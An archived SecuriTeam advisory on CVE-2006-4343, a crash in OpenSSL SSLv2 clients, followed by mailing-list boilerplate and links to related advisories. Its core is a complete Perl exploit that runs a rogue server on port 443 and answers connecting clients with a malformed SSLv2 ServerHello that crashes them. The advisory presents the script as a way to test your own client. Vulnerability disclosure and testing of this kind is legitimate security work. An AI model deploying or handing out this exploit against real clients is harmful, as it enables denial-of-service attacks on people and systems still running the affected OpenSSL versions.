[EXPL] OpenSSL SSLv2 Client Crash (NULL Reference)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



OpenSSL SSLv2 Client Crash (NULL Reference)
------------------------------------------------------------------------


SUMMARY

A vulnerability in the way OpenSSL handles ServerHello packets allows
remote attackers to cause the client connecting to it to crash, the
following exploit code can be used to test your client for the
vulnerability.

DETAILS

Vulnerable Systems:
* OpenSSL version 0.9.7 before 0.9.7l
* OpenSSL version 0.9.8 before 0.9.8d

Immune Systems:
* OpenSSL version 0.9.7l
* OpenSSL version 0.9.8d

Exploit:
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be
crashed by special SSL serverhello response

use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp',
Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;

my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());

while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) &&
recv($new_sock, $line, 1024, undef);

my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers));

my $certificate = "";
my $certificate_length = pack('n', length($certificate));

my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)

"\x00". # No certificate

"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";

my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2;

print $new_sock $packet_sslv2;

close($new_sock);
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:noamr@xxxxxxxxxxxxxxxxxx>
Noam Rathaus.
The original article can be found at:
<http://www.beyondsecurity.com/bestorm_overview.html>
http://www.beyondsecurity.com/bestorm_overview.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] OpenSSL Multiple Vulnerabilities (Malformed ASN.1, Malformed Public Key)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... and prepared fixes for a number of vulnerabilities in the OpenSSL ASN1 ... OpenSSL to parse a client certificate from an SSL/TLS client when it ... resulting in a denial of service vulnerability. ...
    (Securiteam)
  • [NEWS] OpenSSL NULL Pointer Assignment and Kerberos Ciphersuites Out-of-bounds
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Testing performed by the OpenSSL group using the Codenomicon TLS Test Tool ... A remote attacker could perform a carefully crafted SSL/TLS ... Out-of-bounds Read Affects Kerberos Ciphersuites ...
    (Securiteam)
  • [NEWS] Multiple OpenSSL TLS Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... OpenSSL has two TLS related programming errors which cause it to crash. ... The first error causes OpenSSL to crash to segmentation fault when it ... 'Server Key exchange message' is omitted from the TLS handshake. ...
    (Securiteam)
  • [NEWS] OpenSSL SSL 2.0 Rollback
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The vulnerability potentially ... affected by the OpenSSL Roolback vulnerability. ... "man in the middle" can force a client and a server to negotiate the SSL ...
    (Securiteam)
  • [NEWS] Denial of Service in ASN.1 Parsing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability in OpenSSL version 0.9.6k when running on a Windows ... On platforms such as Windows, ... MD5 checksum: 843a65ddc56634f0e30a4f9474bb5b27 ...
    (Securiteam)